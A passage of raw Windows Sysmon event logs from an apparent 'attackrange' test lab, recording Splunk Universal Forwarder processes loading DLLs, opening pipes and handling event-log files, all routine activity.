Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345443Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.205{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345442Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345441Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345440Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345439Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345438Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345437Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345436Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345435Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345434Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345433Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345432Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345431Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057345430Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345429Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057345428Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345427Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345426Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345425Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.189{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345424Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345423Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345422Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345421Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345420Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345419Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345418Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345417Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345416Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057345415Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345414Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345413Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345412Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345411Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057345410Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-8868-6164-0500-00000000F101}424548C:\Windows\system32\csrss.exe{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345409Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.174{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345408Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:09.168{8B6011A9-5B45-618E-41F3-04000000F101}7348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.167{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:09.167{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.167{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:09.167{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:09.167{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:09.167{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x800000000000000021219611Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:17:10.759{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DBA76E8F58C408986958E583C0A5FEF,SHA256=9D56A08A9B4F1EB288E16222A06BD6F4CA3C2B382B77728A0A1902DC4BC8E6A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057345642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.932{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.932{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B77BC0E21921F499B9CB68F579585589,SHA256=791D3CDF267912EB1DCB0BA0896D95555CA2C3072B6995FCE77DA011C2CDDCF9falsetrue 734700x800000000000000057345640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057345636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x800000000000000057345634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft 